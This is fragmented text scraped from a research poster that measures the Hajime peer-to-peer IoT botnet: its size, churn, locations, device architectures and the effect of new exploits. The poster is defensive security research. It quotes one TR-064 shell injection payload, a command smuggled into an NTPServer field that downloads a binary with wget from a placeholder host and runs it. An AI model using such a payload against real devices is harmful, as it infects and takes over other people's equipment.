measurement and analysis of hajime, a peer-to-peer iot botnet · 2019-03-04 · hajime testing...
Post on 26-Jul-2020
3 Views
Preview:
TRANSCRIPT
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
0K10K20K30K40K50K60K70K80K90K
100K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f dis
tinct
bot
s
Time (20-minute bins)
OthersBrazil
Iran
MexicoChina
S. India
S. KoreaUS
Turkey
RussiaIndonesia
atk.mipseb update.i.mipseb update
0K
100K
200K
300K
400K
500K
600K
BR CN IR IN KR US TR RU MX IT
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
0K
100K
200K
300K
400K
500K
600K
BR IR MX CN IN KR US TR RU ID
Num
ber o
f dis
tinct
bot
s
Country
arm5arm6arm7mipselmipseb
unknown4M
5M
4M
5M
0
10K
20K
30K
40K
50K
60K
11/16 01/17 03/17 05/17 07/17 09/17 11/17 01/18 03/18 05/18
TR-0
64 in
ject
ion
atte
mpt
s
Time (20-minute bins)
HajimeMirai
config update.i.mipseb update
atk.mipseb update.i.mipsel update
atk.mipsel update
Measurement and Analysis of Hajime, a Peer-to-Peer IoT Botnet Stephen Herwig Katura Harvey George Hughey Richard Roberts Dave Levin smherwig@cs.umd.edu katura@cs.umd.edu ghughey@terpmail.umd.edu ricro@cs.umd.edu dml@cs.umd.edu
Intended Victim (non-vulnerable)
Shell Injection DNS Lookup
NTPServer=`cd /tmp;wget http://1.2.3.4:5678/X;chmod 777 X; ./X`
Exploits
Botnet Size
Location
Devices
BitTorrent DHT
DatasetsDHT ScansuTP Scans (10.5M keys)Binary reverse engineering (52 payloads)
Bot IP = 1.2.3.4 D-root
Chimay-RedGPON shell injection
TR-064 shell injectionDNS Backscatter (125M queries)
HajimeMirai successorRuns on many architecturesRegular updates, new exploits
Goals To inform defenses and intervention: characterize steady-state behavior understand effect of new exploits on botnet
Churn
0K
5K
10K
15K
20K
25K
30K
35K
40K
45K
01-26 02-09 02-23 03-09 03-23 04-06 04-20 05-04 05-18 06-01
Num
ber o
f birt
hs a
nd d
eath
s
Time (20-minute bins)
atk.mipseb update.i.mipseb update
birthsdeaths
Steady-state churn: 2K Median bot lifetime: 5 hours
The GPON exploit disproportionately affects Mexico
Chimay-Red increases proportion of MikroTik bots from 0.79% to 80.29%.GPON exploit changes Mexico from primarily ARM to MIPS.
74.2% of bot devices are MIPS big endian.
Exploit Effects
Devices overwhelmingly run MIPSSteady-state of ~40K bots
52.5% of bots are in Brazil
Russia goes from 500 active bots per hour to 6K following Chimay-Red.
Evolution of TR-064 Exploit
Miraideployment
Hajimetesting
Hajime deployment
uTP
Sess
ion
Non-vulnerable hosts interpret this as a hostname with an unfamiliar TLD (./X`)
Learns attacking bots’IP addresses
Announce“I have ” Who has
Repeated Getsconstruct the entire setof bots with a given fileGet
“Who has ”
1
2
3
Hajime uses BitTorrent’s DHT for Command-and-Control
Peaks of 95K after Chimay-Red and GPON exploits
IoT Botnets Pose a Major Threat
Reboots and reinfectionsare common
⇒
We are longitudinally measuring Hajime
uTP SessionuTP SessionuTP SessionuTP handshakes yieldper-bot long-lived keys
The geographic makeup of IoT botnets can change rapidly
Mirai Largest DoSattacks inhistory
top related